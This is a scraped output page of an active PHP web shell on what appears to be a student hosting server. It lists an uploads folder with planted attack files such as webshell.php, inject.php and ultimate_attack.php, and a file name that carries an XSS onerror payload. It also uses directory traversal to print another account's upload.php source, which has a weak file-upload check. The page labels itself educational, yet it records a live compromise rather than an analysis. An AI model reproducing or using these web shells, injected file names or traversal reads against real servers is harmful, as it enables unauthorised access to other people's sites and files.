π WEB SHELL ACTIVATED
π File Browser
Current directory: /home/klas4s23/domains/585455.klas4s23.mid-ica.nl/public_html/Gastenboek/uploads
π ' onerror='alert(`Gehacked door Jasper!`);window.location.replace(`..`)'.png
[view]π
..π 003b15869ae62d2ceeee451a5f652dd6.png
[view]π 0tk5j14v024b1.jpg
[view]π 300px-Cursed_Cat.jpg
[view]π 32640-afbeelding-1__ScaleMaxWidthWzYwMF0_CompressedW10.jpg
[view]π Bill-Gates-Paul-Allen-2013.jpg
[view]π CV Jasper Kramp.png
[view]π Cat profile.png
[view]π Fronalpstock_big.jpg
[view]π Krik en las.jpg
[view]π Krik.jpg
[view]π Pino-dood-03.jpg
[view]π Shellz.php
[view]π Ted_Kaczynski_2_(cropped).jpg
[view]π Tux.svg.png
[view]π Z.png
[view]π android.jpg
[view]π apple.php
[view]π cianancatfish.jpg
[view]π downloads (1).jpeg
[view]π downloads.jpeg
[view]π epresso.jpg
[view]π fake_photo.png
[view]π hand.jpg
[view]π https___dynaimage.cdn.cnn.com_cnn_x_156,y_210,w_1209,h_1612,c_crop_https2F2F5bae1c384db3d70020c01c40%2FfireflyWolfy.jpg
[view]π image.png
[view]π images.jpeg
[view]π info.php
[view]π inject.php
[view]π instant_redirect.jpg
[view]π japper.jpg
[view]π koekiemonster-3.jpg
[view]π logo.png
[view]π muis.jpg
[view]π people-call-woman-ugly-responds-with-more-selfies-melissa-blake-1-5d75f249a418b__700.jpg
[view]π picobellobv.jpeg
[view]π redirect.php
[view]π rupsje-nooitgenoeg-knuffel-pluche-42-cm-500x500.jpg
[view]π sdfsa.png
[view]π sneaky.svg
[view]π taylor.webp
[view]π test.html
[view]π testpreg.php
[view]π testpreg1.php
[view]π testtest.php.JPG
[view]π ultimate_attack.gif
[view]π ultimate_attack.php
[view]π ultimate_attack.svg
[view]π wallpaper.jpg
[view]π webshell.php
[view]π Viewing: ./../../../../586387.klas4s23.mid-ica.nl/public_html/website/upload.php
<?php
if ($_SERVER["REQUEST_METHOD"] == "POST" && isset($_FILES["image"])) {
$target_dir = "uploads/";
$target_file = $target_dir . basename($_FILES["image"]["name"]);
$uploadOk = 1;
$imageFileType = strtolower(pathinfo($target_file, PATHINFO_EXTENSION));
$check = getimagesize($_FILES["image"]["tmp_name"]);
if ($check === false) {
echo "Het bestand is geen afbeelding.";
$uploadOk = 0;
}
if ($_FILES["image"]["size"] > 5000000) {
echo "Sorry, het bestand is te groot.";
$uploadOk = 0;
}
if ($imageFileType != "jpg" && $imageFileType != "jpeg" && $imageFileType != "png" && $imageFileType != "gif") {
echo "Sorry, alleen JPG, JPEG, PNG en GIF bestanden zijn toegestaan.";
$uploadOk = 0;
}
if ($uploadOk) {
if (move_uploaded_file($_FILES["image"]["tmp_name"], $target_file)) {
echo '<div style="width: 300px; height: 300px; overflow: hidden;">';
echo '<img src="' . $target_file . '" alt="GeΓΌploade afbeelding" style="width: 100%; height: auto;">';
echo '</div>';
} else {
echo "Sorry, er was een probleem met het uploaden van het bestand.";
}
}
}
?>
π― Available Actions
β οΈ Educational Warning: This demonstrates a web shell vulnerability.
In a real attack, this could allow complete server compromise!
![[view]](?view=.%2F%27+onerror%3D%27alert%28%60Gehacked+door+Jasper%21%60%29%3Bwindow.location.replace%28%60..%60%29%27.png){kind=link}
![[view]](?view=.%2F003b15869ae62d2ceeee451a5f652dd6.png){kind=link}
![[view]](?view=.%2F0tk5j14v024b1.jpg){kind=link}
![[view]](?view=.%2F300px-Cursed_Cat.jpg){kind=link}
![[view]](?view=.%2F32640-afbeelding-1__ScaleMaxWidthWzYwMF0_CompressedW10.jpg){kind=link}
![[view]](?view=.%2FBill-Gates-Paul-Allen-2013.jpg){kind=link}
![[view]](?view=.%2FCV+Jasper+Kramp.png){kind=link}
![[view]](?view=.%2FCat+profile.png){kind=link}
![[view]](?view=.%2FFronalpstock_big.jpg){kind=link}
![[view]](?view=.%2FKrik+en+las.jpg){kind=link}
![[view]](?view=.%2FKrik.jpg){kind=link}
![[view]](?view=.%2FPino-dood-03.jpg){kind=link}
![[view]](?view=.%2FTed_Kaczynski_2_%28cropped%29.jpg){kind=link}
![[view]](?view=.%2FTux.svg.png){kind=link}
![[view]](?view=.%2FZ.png){kind=link}
![[view]](?view=.%2Fandroid.jpg){kind=link}
![[view]](?view=.%2Fcianancatfish.jpg){kind=link}
![[view]](?view=.%2Fdownloads+%281%29.jpeg){kind=link}
![[view]](?view=.%2Fdownloads.jpeg){kind=link}
![[view]](?view=.%2Fepresso.jpg){kind=link}
![[view]](?view=.%2Ffake_photo.png){kind=link}
![[view]](?view=.%2Fhand.jpg){kind=link}
![[view]](?view=.%2Fhttps___dynaimage.cdn.cnn.com_cnn_x_156%2Cy_210%2Cw_1209%2Ch_1612%2Cc_crop_https2F2F5bae1c384db3d70020c01c40%252FfireflyWolfy.jpg){kind=link}
![[view]](?view=.%2Fimage.png){kind=link}
![[view]](?view=.%2Fimages.jpeg){kind=link}
![[view]](?view=.%2Finstant_redirect.jpg){kind=link}
![[view]](?view=.%2Fjapper.jpg){kind=link}
![[view]](?view=.%2Fkoekiemonster-3.jpg){kind=link}
![[view]](?view=.%2Flogo.png){kind=link}
![[view]](?view=.%2Fmuis.jpg){kind=link}
![[view]](?view=.%2Fpeople-call-woman-ugly-responds-with-more-selfies-melissa-blake-1-5d75f249a418b__700.jpg){kind=link}
![[view]](?view=.%2Fpicobellobv.jpeg){kind=link}
![[view]](?view=.%2Frupsje-nooitgenoeg-knuffel-pluche-42-cm-500x500.jpg){kind=link}
![[view]](?view=.%2Fsdfsa.png){kind=link}
![[view]](?view=.%2Fsneaky.svg){kind=link}
![[view]](?view=.%2Ftaylor.webp){kind=link}
![[view]](?view=.%2Ftesttest.php.JPG){kind=link}
![[view]](?view=.%2Fultimate_attack.gif){kind=link}
![[view]](?view=.%2Fultimate_attack.svg){kind=link}
![[view]](?view=.%2Fwallpaper.jpg){kind=link}